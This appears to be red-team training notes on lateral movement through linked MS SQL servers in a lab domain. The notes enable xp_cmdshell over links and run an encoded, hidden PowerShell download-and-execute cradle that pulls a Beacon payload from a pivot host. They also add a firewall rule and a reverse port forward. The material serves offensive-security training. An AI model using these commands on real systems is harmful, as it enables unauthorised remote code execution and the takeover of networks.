MS SQL Lateral Movement
SQL Servers have a concept called "links", which allows a database instance to access data from an external source. MS SQL supports multiple sources, including other MS SQL Servers. These can also be practically anywhere - including other domains, forests or in the cloud.
We can discover any links that the current instance has:
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
\

\
This shows a link to sql-1.cyberbotic.io which we can query using OpenQuery:
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
The use of double and single quotes is important when using OpenQuery.
We can also check the xp_cmdshell status.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
\
If xp_cmdshell is disabled, you won't be able to enable it by executing sp_configure via OpenQuery. If RPC Out is enabled on the link (which is not the default configuration), then you can enable it using the following syntax:
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
The square braces are required.
\
Manually querying databases to find links can be cumbersome and time-consuming, so you can also use Get-SQLServerLinkCrawl
to automatically crawl all available links.
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
Version : SQL Server 2019
Instance : SQL-2
CustomQuery :
Sysadmin : 1
Path : {SQL-2}
User : DEV\bfarmer
Links : {SQL-1.CYBERBOTIC.IO}
Version : SQL Server 2019
Instance : SQL-1
CustomQuery :
Sysadmin : 1
Path : {SQL-2, SQL-1.CYBERBOTIC.IO}
User : sa
Links :
\
This output shows that the link from SQL-2 to SQL-1 is configured with a local 'sa' account, and that it has sysadmin privileges on the remote server.
To execute a Beacon on SQL-1, we can pretty much repeat the same steps as previously. However, note that SQL-1 may only be able to talk to SQL-2 and not to WKSTN-2 or any other machine in the DEV domain.
beacon> run hostname
sql-2
beacon> getuid
[*] You are DEV\mssql_svc (admin)
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80
\
Because of all of the additional quotes needed for OpenQuery, it's easier to use an encoded command.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')
The inclusion of a benign statement at the beginning of the query is required for xp_cmdshell to trigger.
\
beacon> link sql-1.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337
[+] established link to child beacon: 10.10.120.25
\

Last updated